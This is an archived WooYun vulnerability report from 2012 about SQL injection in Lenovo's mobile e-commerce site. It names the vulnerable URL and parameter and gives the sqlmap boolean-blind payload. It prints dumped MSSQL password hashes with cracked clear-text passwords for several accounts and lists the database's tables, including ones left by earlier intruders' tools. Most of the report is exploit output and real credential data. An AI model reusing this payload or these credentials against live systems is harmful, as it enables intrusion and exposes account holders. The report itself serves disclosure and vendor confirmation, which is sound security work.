乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-08-12: 细节已通知厂商并且等待厂商处理中 2012-08-13: 厂商已经确认,细节仅向厂商公开 2012-08-23: 细节向核心白帽子及相关领域专家公开 2012-09-02: 细节向普通白帽子公开 2012-09-12: 细节向实习白帽子公开 2012-09-26: 细节向公众公开
射了一个星期了,精疲力尽,实在不能进一步发展鸟
1.这个站点啦,联想移动电子商务系统哦,貌似和牛B的样子:
http://ec.lenovomobile.com/
2.这里可以注射:
http://ec.lenovomobile.com/WebForm/Other/Other_download/Other_DownLoad_ListInfo.aspx?List_Name=联想移动合作银行
3.SA跑的呢:
4.可以跨多个库哦:
5.多个数据库账户的弱口令:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: List_Name Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: List_Name=联想移动合作银行' AND 6011=6011 AND 'HHoo'='HHoo---database management system users password hashes:[*] sa [1]: password hash: 0x0100b067524976ec63baa2ca005f95c57ee92c62e5dc0d2a27072c2812de9a617e1108f39c388b5252c274bebe9e header: 0x0100 salt: b0675249 mixedcase: 76ec63baa2ca005f95c57ee92c62e5dc0d2a2707 uppercase: 2c2812de9a617e1108f39c388b5252c274bebe9e[*] shenjx [1]: password hash: 0x01003e74822ba8b269e35e354d5c51ae092ac3fa75a7b1dba093a8b269e35e354d5c51ae092ac3fa75a7b1dba093 header: 0x0100 salt: 3e74822b mixedcase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093 uppercase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093 clear-text password: 654321[*] swwl [1]: password hash: 0x0100b575e507b98bcb343331377b5ba7a26a09e83a51821c2f96fa0950ee393ffbb1980d997bce436645398f0219 header: 0x0100 salt: b575e507 mixedcase: b98bcb343331377b5ba7a26a09e83a51821c2f96 uppercase: fa0950ee393ffbb1980d997bce436645398f0219 clear-text password: swwl[*] wends [1]: password hash: 0x01001a76751df147fd28495401d6f84e98be0ba48bb05226b4e1e046486691b981689f41de885727f169f0850578 header: 0x0100 salt: 1a76751d mixedcase: f147fd28495401d6f84e98be0ba48bb05226b4e1 uppercase: e046486691b981689f41de885727f169f0850578 clear-text password: wends
6.看下当前库【LMECOTHER】的表信息,在此之前已经有人来过了,留下了D99和pangolin的临时表哎:
Database: LMECOTHER[38 tables]+--------------------------------------------------+| dbo.D99_CMD || dbo.D99_Tmp || dbo.Other_Address_List || dbo.Other_Address_Org || dbo.Other_BBS_Forum || dbo.Other_BBS_ForumGroups || dbo.Other_BBS_Posts || dbo.Other_BBS_RePosts || dbo.Other_BBS_Users || dbo.Other_ClickStat || dbo.Other_CusLine || dbo.Other_CusLine_Type || dbo.Other_DownLoad_KnowLedge_Type || dbo.Other_DownLoad_List || dbo.Other_DownLoad_List_Type || dbo.Other_DownLoad_Pic || dbo.Other_DownLoad_Tools || dbo.Other_DownLoad_knowledge || dbo.Other_Link || dbo.Other_Rule || dbo.Other_Survey || dbo.Other_Survey_Item || dbo.Other_Survey_Result || dbo.View_Forum || dbo.View_PostList || dbo.dtproperties || dbo.kill_kk || dbo.other_CustMailInfo || dbo.other_CustMailView || dbo.other_Notice || dbo.other_Notice_New || dbo.other_Notification || dbo.other_NotificationObj || dbo.other_NotificationObj_New || dbo.other_Notification_New || dbo.pangolin_test_table || dbo.sysconstraints || dbo.syssegments |+--------------------------------------------------+
发礼物吧,还能怎么办!
危害等级:高
漏洞Rank:15
确认时间:2012-08-13 01:07
thank you very much!
暂无